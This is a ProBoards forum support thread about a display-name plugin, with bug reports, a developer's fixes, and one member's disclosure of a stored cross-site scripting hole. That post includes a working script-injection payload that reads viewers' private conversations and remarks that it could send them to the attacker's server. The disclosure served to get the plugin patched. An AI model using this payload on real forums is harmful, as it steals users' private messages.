#00AF33
Official Code Helper
19529
0
1
Nov 19, 2012 14:18:28 GMT -8
Todge
**
17,285
January 2004
todge
|
Post by Todge on Oct 18, 2018 11:52:10 GMT -8
Todgeso uhh.. I had some odd things happen with this. xD First, I had a member with the display name "Brynora." As a joke, I changed her name to "Brynora Hand." (long story) I went back and changed her name to normal and it showed the normal name "Brynora" everywhere--in her edit profile, on the homepage... except her main profile still, oddly, showed the old version. So then I erased her display name text field entirely in her edit profile and re-entered it, except it...wrote itself in backward. Like this: View AttachmentNo idea how that happened. So I disabled this plugin and redid it and everything functioned normally. I don't know exactly what to make of this bug xD This is bizarre, I can't get either of those errors to occur on my test forum. I guess I can image the first error occuring, but I have no idea how the display name can be reversed. Can you make this happen again?
|
|
inherit
223470
0
Feb 27, 2019 17:05:53 GMT -8
₪» ⅀ ƪ Ƒ «₪
Original registration date: 2007. DeviantART: http://deviantart.com/ruanly. Discord: Ruanly#7946.
1,281
July 2015
fajita
|
Post by ₪» ⅀ ƪ Ƒ «₪ on Oct 19, 2018 8:03:23 GMT -8
TodgeI am not entirely sure what all happened, either, haha. Verrry weird bug. I'll try to mess around and see if I can recreate it! If I can't, then it might have been a fluke or something. Could it have to do with what Peter said here? Todge, Might want to sanitize the output ;)
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 24, 2018 9:45:51 GMT -8
If I go to the Member page, and sort the list by ascending date registered, then I don't see the full names anymore, under "Name". I see the shortened version of the names.
It's only when I initially click on the Member page, that I see the full names.
Can this be fixed?
|
|
#00AF33
Official Code Helper
19529
0
1
Nov 19, 2012 14:18:28 GMT -8
Todge
**
17,285
January 2004
todge
|
Post by Todge on Oct 25, 2018 14:39:02 GMT -8
If I go to the Member page, and sort the list by ascending date registered, then I don't see the full names anymore, under "Name". I see the shortened version of the names. It's only when I initially click on the Member page, that I see the full names. Can this be fixed? It can indeed...
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 27, 2018 11:59:22 GMT -8
If I go to the Member page, and sort the list by ascending date registered, then I don't see the full names anymore, under "Name". I see the shortened version of the names. It's only when I initially click on the Member page, that I see the full names. Can this be fixed? It can indeed...
Perfect.
Works great.
Thanks again.
|
|
inherit
223470
0
Feb 27, 2019 17:05:53 GMT -8
₪» ⅀ ƪ Ƒ «₪
Original registration date: 2007. DeviantART: http://deviantart.com/ruanly. Discord: Ruanly#7946.
1,281
July 2015
fajita
|
Post by ₪» ⅀ ƪ Ƒ «₪ on Oct 27, 2018 13:24:22 GMT -8
TodgeDoes the latest version have the output sanitized? I don't wanna risk vulnerability to malicious no-good-doers haha =3
|
|
#00AF33
Official Code Helper
19529
0
1
Nov 19, 2012 14:18:28 GMT -8
Todge
**
17,285
January 2004
todge
|
Post by Todge on Oct 27, 2018 15:03:27 GMT -8
TodgeDoes the latest version have the output sanitized? I don't wanna risk vulnerability to malicious no-good-doers haha =3 The only people that can edit the member names are the account members themselves, and any staff with the powers to edit profiles, so if you have any 'malicious' display names pop-up you will know who the culprits must be.
|
|
inherit
2671
0
May 14, 2013 14:40:03 GMT -8
Peter
🐺
10,615
February 2002
peter3
|
Post by Peter on Oct 28, 2018 4:37:10 GMT -8
The only people that can edit the member names are the account members themselves, and any staff with the powers to edit profiles, so if you have any 'malicious' display names pop-up you will know who the culprits must be. I'm sorry but that is a poor excuse for not fixing a vulnerability that is actually easy to fix. You didn't acknowledge my post on the previous page about it either when I posted the tip for you, so it worries me that you aren't too bothered. Doesn't matter if one forum is using the plugin, or 1000's. XSS vulnerabilities are no joke. It's the most common bug in the world. I am not a security specialist. There could be vulnerabilities in my plugins, and if someone finds them and lets me know, I would be thankful and release a fix ASAP. But to shrug it off and leave it down to staff or members to "notice" malicious names is the wrong attitude. Not only does it reflect bad on you, but also on the ProBoards service. Data in the key that is getting used for the display name is executed on all pages that member appears on. So any client viewing the forum will become a victim of the exploit. You assume that the exploit will be something noticeable by other members / staff. So let me show you just a very small sample of what I can do to your plugin. I spent like 2 mins writing this, and it's not even complex. I could improve this easily. But even with this simple exploit, it's pretty dangerous. pb.plugin.key("xl_displayname").set({
object_id: pb.data("user").id, value: '<script>fetch("/conversations").then(r => { return r.text(); }).then(html => { let parser = new DOMParser(); let doc = parser.parseFromString(html, "text/html"); let link = doc.querySelector(".conversation-link"); fetch(link).then(r => { return r.text(); }).then(html => { console.log(new DOMParser().parseFromString(html, "text/html").querySelector("div.message").textContent); }); });</script>'
}); All that I have to do is add another line of code and send the content to my server so I can collect them for later viewing. Let's expand the code so it's more readable: fetch("/conversations").then(r => {
return r.text(); }).then(html => {
let parser = new DOMParser(); let doc = parser.parseFromString(html, "text/html"); let link = doc.querySelector(".conversation-link");
fetch(link).then(r => { return r.text(); }).then(html => { // Log out to console. This could then be sent to a server to collect everyones // messages. console.log(new DOMParser().parseFromString(html, "text/html").querySelector("div.message").textContent); }); });
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 28, 2018 9:31:57 GMT -8
Is that script posting above logging posts to the console, or private messages to the console?
Where did you enter that code? In the plug-in file itself, or in one of the UI templates?
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 28, 2018 9:35:50 GMT -8
I have another question.
When auto-completing a name, it seems that I have to use the username, not the display name. If someone has a different display name than user name, then someone has to know what the user name is, to correctly finish the autocomplete.
Is this the expected behavior? Just asking a question. Not saying this should be fixed, or needs to be fixed.
To me, it seems like a little bit of a disconnect. Since people generally see what the display name is, and not the user name. But again, maybe that's the expected behavior for different reasons. So just thought I'd ask.
|
|
#00AF33
Official Code Helper
19529
0
1
Nov 19, 2012 14:18:28 GMT -8
Todge
**
17,285
January 2004
todge
|
Post by Todge on Oct 28, 2018 10:03:56 GMT -8
Version 0.0.3 fixes the issue Peter ranted about above. Peter, I did not even take into consideration that anyone would write to the key outside of the plugin itself, I was not ignoring you, with the ' ' you added I assumed you were just joking about the weird output ₪» ⅀ ƪ Ƒ «₪ was getting. If I had thought that anyone would write malicious code into the plugin it would never have been made public in it's original form.
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 28, 2018 11:57:11 GMT -8
Version 0.0.3 fixes the issue Peter ranted about above. Peter , I did not even take into consideration that anyone would write to the key outside of the plugin itself, I was not ignoring you, with the ' ' you added I assumed you were just joking about the weird output ₪» ⅀ ƪ Ƒ «₪ was getting. If I had thought that anyone would write malicious code into the plugin it would never have been made public in it's original form.
I installed this version.
I'm not seeing the full SNs under the "name" on the Member List anymore.
In fact, when I go to a post made by such a user, I'm not seeing their display name either. Just the user name.
|
|
#00AF33
Official Code Helper
19529
0
1
Nov 19, 2012 14:18:28 GMT -8
Todge
**
17,285
January 2004
todge
|
Post by Todge on Oct 28, 2018 14:30:38 GMT -8
I installed this version. I'm not seeing the full SNs under the "name" on the Member List anymore. In fact, when I go to a post made by such a user, I'm not seeing their display name either. Just the user name.
The username should only be visible when you hover over the display name, there is no way this plugin can cause the usernames to be displayed instead, at worst you would just see the original display name. Can you please post a link to a thread where you are having this problem so I can take a look. Thanks.
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 28, 2018 16:06:29 GMT -8
I installed this version. I'm not seeing the full SNs under the "name" on the Member List anymore. In fact, when I go to a post made by such a user, I'm not seeing their display name either. Just the user name.
The username should only be visible when you hover over the display name, there is no way this plugin can cause the usernames to be displayed instead, at worst you would just see the original display name. Can you please post a link to a thread where you are having this problem so I can take a look. Thanks.
This plugin was working great in versions 1 and 2.
When I was in a thread, I was seeing the display name.
And after the fix in version 2, when I was on the Member page, I was seeing the display name.
Now, if you look at post # 141:
The SN it is showing is "wwtcbwsr". After I had installed versions 1 and 2 of the plug-in, it was showing the full long name, "WhereWouldTheClippersBeWithoutSeanRooks".
Furthermore, I just went to his/her profile. I see it lost the display name. I think it happened after I installed version 3 of the plug-in. I tried changing it right now.
I am getting an error "JS Error: TypeError: XLName is undefined".
Furthermore, under the "Name" section of the member page, it is not showing the full names either.
If I look at the profile for "windsoruk", the display name is "WindsorUK". But it is showing "windsoruk" under Name.
Previously, in versions 1 and 2 of the plug-in, it was showing the display name.
|
|
inherit
247374
0
Jan 14, 2023 21:43:03 GMT -8
nuraman00
142
July 2017
nuraman00
|
Post by nuraman00 on Oct 28, 2018 16:07:20 GMT -8
I have another question. When auto-completing a name, it seems that I have to use the username, not the display name. If someone has a different display name than user name, then someone has to know what the user name is, to correctly finish the autocomplete. Is this the expected behavior? Just asking a question. Not saying this should be fixed, or needs to be fixed. To me, it seems like a little bit of a disconnect. Since people generally see what the display name is, and not the user name. But again, maybe that's the expected behavior for different reasons. So just thought I'd ask.
Also, Todge, what are your thoughts on this topic?
|
|